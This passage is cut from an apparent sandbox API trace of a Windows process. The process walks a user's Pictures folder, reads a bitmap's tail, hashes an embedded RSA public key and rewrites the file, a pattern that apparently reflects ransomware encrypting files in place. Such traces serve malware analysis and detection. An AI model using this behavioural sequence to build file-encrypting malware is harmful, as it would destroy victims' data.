nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94ItO", cAlternateFileName="")) returned 1 [0131.547] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.547] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0131.547] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0131.547] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0131.548] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.548] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.548] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.548] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned=".ini" [0131.548] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.548] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94f8eca0, ftCreationTime.dwHighDateTime=0x1d5e2e4, ftLastAccessTime.dwLowDateTime=0x13060980, ftLastAccessTime.dwHighDateTime=0x1d5e78f, ftLastWriteTime.dwLowDateTime=0x13060980, ftLastWriteTime.dwHighDateTime=0x1d5e78f, nFileSizeHigh=0x0, nFileSizeLow=0xd95d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F7SCOhaGE9Z.bmp", cAlternateFileName="F7SCOH~1.BMP")) returned 1 [0131.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.548] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.548] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.548] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F7SCOhaGE9Z.bmp") returned=".bmp" [0131.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F7SCOhaGE9Z.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\f7scohage9z.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0131.548] GetFileSizeEx (in: hFile=0x6e4, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=55645) returned 1 [0131.548] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.551] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0xd937, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.551] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.552] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.552] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.552] SetFilePointer (in: hFile=0x6e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.552] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xd95d, lpOverlapped=0x0) returned 1 [0131.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.553] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.553] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.554] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.554] CryptHashData (hHash=0xdce3b30, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.554] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.554] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.554] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.554] GetLastError () returned 0x0 [0131.555] CryptDestroyHash (hHash=0xdce3b30) returned 1 [0131.555] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.555] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.555] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.555] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xd960) returned 0xdd35410 [0131.555] SetFilePointer (in: hFile=0x6e4, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.555] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34ed8 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd170e8 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34f20 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17100 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17130 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17148 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.556] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.556] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17130 | out: hHeap=0x4970000) returned 1 [0131.556] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17148 | out: hHeap=0x4970000) returned 1 [0131.556] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.556] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.556] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17148 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17130 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.556] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17148 | out: hHeap=0x4970000) returned 1 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17130 | out: hHeap=0x4970000) returned 1 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.557] GetCurrentThreadId () returned 0x618 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2d8a0 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.557] GetCurrentThreadId () returned 0x618 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.557] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.557] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17130 [0131.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0131.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17148 [0131.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17118 [0131.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17160 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17130 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17130 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0131.559] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17130 | out: hHeap=0x4970000) returned 1 [0131.559] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.560] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.560] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.560] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.560] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.560] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.560] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0131.560] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.560] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0131.560] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17160 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17148 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17118 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17100 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd34f20 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.563] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0xd958, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, 